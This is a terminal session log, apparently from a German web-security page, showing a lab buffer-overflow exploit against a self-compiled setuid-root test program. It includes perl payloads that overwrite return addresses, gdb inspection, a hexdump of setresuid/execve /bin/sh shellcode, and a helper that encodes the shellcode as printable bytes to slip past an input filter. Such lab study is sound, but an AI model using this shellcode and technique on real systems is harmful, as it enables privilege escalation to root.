root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o update_info update_info.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chown root ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod u+s ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info
Usage: ./update_info <id> <description>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info OCP209 "Enforcement Droid"
[DEBUG]: desc argument is at 0xbffff8db
Updating product #OCP209 with description 'Enforcement Droid'
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: desc argument is at 0xbffff8e8
Speicherzugriffsfehler (Speicherabzug geschrieben)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes

 

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb) run $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
Starting program: /home/tomovic/Dokumente/hack/update_info $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
[DEBUG]: desc argument is at 0xbffff8d8

Program received signal SIGSEGV, Segmentation fault.
0xb7e5f6a5 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) i r eip
eip            0xb7e5f6a5 0xb7e5f6a5 <vfprintf+19909>
(gdb) x/s $eip
0xb7e5f6a5 <vfprintf+19909>: "\362\256Džx\373\377\377"

(gdb) print 0 - 0x39393333 - 0x72727550 - 0x54545421
$1 = 860
(gdb) quit


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o printable_helper printable_helper.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./printable_helper 0 0x80cde189
calculating printable values to subtract from EAX..

start: 0x00000000

     - 0x3465652d
     - 0x25656525
     - 0x25675425
-------------------
end:   0x80cde189
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.
shellcode.bin  shellcode.s   
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./printable_helper 0x80cde189 0x53e28951
calculating printable values to subtract from EAX..

start: 0x80cde189

     - 0x52526d52
     - 0x6152786d
     - 0x79467279
-------------------
end:   0x53e28951
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   
© ALLROUNDER